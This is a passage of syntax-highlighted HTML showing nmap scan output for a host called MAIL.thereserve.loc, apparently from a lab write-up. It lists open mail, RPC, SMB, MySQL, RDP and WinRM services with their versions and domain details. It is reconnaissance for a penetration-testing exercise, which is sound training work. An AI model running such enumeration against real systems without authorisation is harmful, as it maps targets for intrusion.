<\/span><span style=\"color: #C3E88D\">httpd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">http-methods:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Potentially<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">risky<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">methods:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TRACE<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-server-header:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Microsoft-IIS\/10.0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">403<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Forbidden:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Access<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">denied.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">110\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">pop3<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">hMailServer<\/span><span 
style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">pop3d<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_pop3-capabilities:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">USER<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">UIDL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TOP<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">135\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">139\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">netbios-ssn<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">netbios-ssn<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">143\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">imap<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">hMailServer<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">imapd<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span 
style=\"color: #FFCB6B\">_imap-capabilities:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">NAMESPACE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IDLE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">completed<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CAPABILITY<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IMAP4<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SORT<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">QUOTA<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CHILDREN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RIGHTS=texkA0001<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ACL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OK<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IMAP4rev1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">445\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">microsoft-ds?<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">587\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">smtp<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">hMailServer<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">smtpd<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">smtp-commands:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">MAIL,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SIZE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">20480000<\/span><span style=\"color: #C3E88D\">,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">AUTH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LOGIN,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HELP<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">211<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DATA<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HELO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">EHLO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MAIL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">NOOP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">QUIT<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RCPT<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RSET<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SAML<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TURN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">VRFY<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">3306\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">mysql<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">MySQL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#F78C6C\">8.0<\/span><span style=\"color: #C3E88D\">.31<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssl-cert:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Subject:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">commonName=MySQL_Server_8.0.31_Auto_Generated_Server_Certificate<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">before:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-01-10T07:46:11<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">after:<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2033<\/span><span style=\"color: #C3E88D\">-01-07T07:46:11<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_ssl-date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TLS<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">randomness<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">does<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">represent<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">time<\/span><\/span>\n<span class=\"line\"><span 
style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">mysql-info:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Protocol:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Version:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">8.0<\/span><span style=\"color: #C3E88D\">.31<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Thread<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ID:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">83<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Capabilities<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">flags:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">65535<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Some<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Capabilities:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SwitchToSSLAfterHandshake,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Speaks41ProtocolNew,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsCompression,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Speaks41ProtocolOld,<\/span><span 
style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsTransactions,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">InteractiveClient,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IgnoreSpaceBeforeParenthesis,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ODBCClient,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">FoundRows,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IgnoreSigpipes,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Support41Auth,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DontAllowDatabaseTableColumn,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsLoadDataLocal,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LongColumnFlag,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LongPassword,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ConnectWithDatabase,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsMultipleResults,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsAuthPlugins,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsMultipleStatments<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Status:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Autocommit<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Salt:<\/span><span style=\"color: #BABED8\"> \\x<\/span><span style=\"color: #C3E88D\">0D<\/span><span style=\"color: 
#89DDFF\">&amp;<\/span><span style=\"color: #FFCB6B\">QZ\\x10\\x05:S\\x0Bl]-b\\x0E7\\x1C,\\8\\x1D<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Auth<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Plugin<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">caching_sha2_password<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">3389\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">ms-wbt-server<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Terminal<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Services<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">rdp-ntlm-info:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Target_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">THERESERVE<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">NetBIOS_Domain_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">THERESERVE<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">NetBIOS_Computer_Name:<\/span><span style=\"color: 
#BABED8\"> <\/span><span style=\"color: #C3E88D\">MAIL<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNS_Domain_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNS_Computer_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MAIL.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNS_Tree_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Product_Version:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.0<\/span><span style=\"color: #C3E88D\">.17763<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">System_Time:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-06T17:42:18+00:00<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssl-cert:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Subject:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">commonName=MAIL.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#FFCB6B\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">before:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-04T20:25:58<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">after:<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-08-05T20:25:58<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_ssl-date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-06T17:42:28+00:00<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">-1s<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">from<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">scanner<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">time.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">5985\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HTTPAPI<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">httpd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.0<\/span><span 
style=\"color: #BABED8\"> (SSDP\/UPnP)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-server-header:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Microsoft-HTTPAPI\/2.0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">33060\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">mysqlx?<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">fingerprint-strings:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNSStatusRequestTCP,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LDAPSearchReq,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">NotesRPC,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SSLSessionReq,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TLSSessionReq,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">X11Probe:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #FFCB6B\">Invalid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">message<\/span><span style=\"color: #89DDFF\">&quot;<\/span><\/span>\n<span 
class=\"line\"><span style=\"color: #C3E88D\">|     HY000<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">|   oracle-tns: <\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">|     Invalid message-frame.<\/span><span style=\"color: #89DDFF\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">HY000<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">47001\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HTTPAPI<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">httpd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\"> (SSDP\/UPnP)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-server-header:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Microsoft-HTTPAPI\/2.0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49664\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: 
#C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49665\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49666\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49667\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49668\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: 
#BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49669\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49672\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49681\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">service<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">unrecognized<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">despite<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">returning<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">data.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">If<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">you<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">know<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">the<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">service\/version,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">please<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">submit<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">the<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">following<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">fingerprint<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 